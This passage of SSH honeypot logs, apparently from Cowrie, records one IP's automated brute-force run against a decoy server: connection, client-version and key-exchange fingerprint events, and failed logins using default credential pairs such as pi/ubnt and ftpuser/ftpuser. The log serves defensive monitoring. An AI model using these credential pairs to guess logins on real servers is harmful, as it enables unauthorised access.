ac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.617915Z","src_ip":"87.120.191.13","session":"823ab2b734a0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.639735Z","src_ip":"87.120.191.13","session":"c6b3b96f40ff"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ubnt","message":"login attempt [pi/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.642045Z","src_ip":"87.120.191.13","session":"b3123a674f8d"}
{"eventid":"cowrie.login.failed","username":"student","password":"ubnt","message":"login attempt [student/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:34.680210Z","src_ip":"87.120.191.13","session":"823ab2b734a0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.102964Z","src_ip":"87.120.191.13","session":"7bb5d9008177"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35244,"dst_ip":"1.2.3.4","dst_port":22,"session":"51fd81ed9c68","protocol":"ssh","message":"New connection: 87.120.191.13:35244 (1.2.3.4:22) [session: 51fd81ed9c68]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.124114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.125206Z","src_ip":"87.120.191.13","session":"51fd81ed9c68"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.145046Z","src_ip":"87.120.191.13","session":"51fd81ed9c68"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ftpuser","message":"login attempt [admin/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.206814Z","src_ip":"87.120.191.13","session":"51fd81ed9c68"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.573471Z","src_ip":"212.227.235.229","session":"0815cc9dca73"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.594039Z","src_ip":"87.120.191.13","session":"e5b79efdccde"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.612307Z","src_ip":"87.120.191.13","session":"6a46404c5094"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35260,"dst_ip":"1.2.3.4","dst_port":22,"session":"566c8409e99c","protocol":"ssh","message":"New connection: 87.120.191.13:35260 (1.2.3.4:22) [session: 566c8409e99c]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.613804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.614403Z","src_ip":"87.120.191.13","session":"566c8409e99c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.623307Z","src_ip":"87.120.191.13","session":"77d007a34047"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35276,"dst_ip":"1.2.3.4","dst_port":22,"session":"216a9624c4a1","protocol":"ssh","message":"New connection: 87.120.191.13:35276 (1.2.3.4:22) [session: 216a9624c4a1]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.631931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.632684Z","src_ip":"87.120.191.13","session":"216a9624c4a1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.634510Z","src_ip":"87.120.191.13","session":"566c8409e99c"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35292,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1bc839f8683","protocol":"ssh","message":"New connection: 87.120.191.13:35292 (1.2.3.4:22) [session: d1bc839f8683]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.643471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.644333Z","src_ip":"87.120.191.13","session":"d1bc839f8683"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.652260Z","src_ip":"87.120.191.13","session":"216a9624c4a1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.660847Z","src_ip":"87.120.191.13","session":"c6b3b96f40ff"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.664307Z","src_ip":"87.120.191.13","session":"b3123a674f8d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.665149Z","src_ip":"87.120.191.13","session":"d1bc839f8683"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35296,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4f174c5fe7a","protocol":"ssh","message":"New connection: 87.120.191.13:35296 (1.2.3.4:22) [session: a4f174c5fe7a]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.680080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.681463Z","src_ip":"87.120.191.13","session":"a4f174c5fe7a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35300,"dst_ip":"1.2.3.4","dst_port":22,"session":"af2891926ffa","protocol":"ssh","message":"New connection: 87.120.191.13:35300 (1.2.3.4:22) [session: af2891926ffa]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.684305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.685331Z","src_ip":"87.120.191.13","session":"af2891926ffa"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.695549Z","src_ip":"87.120.191.13","session":"566c8409e99c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.702191Z","src_ip":"87.120.191.13","session":"823ab2b734a0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.703063Z","src_ip":"87.120.191.13","session":"a4f174c5fe7a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.706034Z","src_ip":"87.120.191.13","session":"af2891926ffa"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.713033Z","src_ip":"87.120.191.13","session":"216a9624c4a1"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35312,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbe31866f09f","protocol":"ssh","message":"New connection: 87.120.191.13:35312 (1.2.3.4:22) [session: fbe31866f09f]","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.721673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.722712Z","src_ip":"87.120.191.13","session":"fbe31866f09f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.730564Z","src_ip":"87.120.191.13","session":"d1bc839f8683"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.742862Z","src_ip":"87.120.191.13","session":"fbe31866f09f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.766336Z","src_ip":"87.120.191.13","session":"a4f174c5fe7a"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:35.767502Z","src_ip":"87.120.191.13","session":"af2891926ffa"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.059853Z","src_ip":"87.120.191.13","session":"fbe31866f09f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.229614Z","src_ip":"87.120.191.13","session":"51fd81ed9c68"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35326,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9cd59a3c2f0","protocol":"ssh","message":"New connection: 87.120.191.13:35326 (1.2.3.4:22) [session: d9cd59a3c2f0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.253188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.254159Z","src_ip":"87.120.191.13","session":"d9cd59a3c2f0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.274825Z","src_ip":"87.120.191.13","session":"d9cd59a3c2f0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"student","message":"login attempt [admin/student] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.369921Z","src_ip":"87.120.191.13","session":"d9cd59a3c2f0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.717026Z","src_ip":"87.120.191.13","session":"566c8409e99c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.735603Z","src_ip":"87.120.191.13","session":"216a9624c4a1"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35330,"dst_ip":"1.2.3.4","dst_port":22,"session":"499536f6a4cd","protocol":"ssh","message":"New connection: 87.120.191.13:35330 (1.2.3.4:22) [session: 499536f6a4cd]","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.736919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.739271Z","src_ip":"87.120.191.13","session":"499536f6a4cd"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.753439Z","src_ip":"87.120.191.13","session":"d1bc839f8683"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35332,"dst_ip":"1.2.3.4","dst_port":22,"session":"af902a7b804e","protocol":"ssh","message":"New connection: 87.120.191.13:35332 (1.2.3.4:22) [session: af902a7b804e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.755650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.756534Z","src_ip":"87.120.191.13","session":"af902a7b804e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.769877Z","src_ip":"87.120.191.13","session":"499536f6a4cd"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35348,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb31d84bf172","protocol":"ssh","message":"New connection: 87.120.191.13:35348 (1.2.3.4:22) [session: fb31d84bf172]","sensor":"my-vps","timestamp":"2025-08-26T13:58:36.773856Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-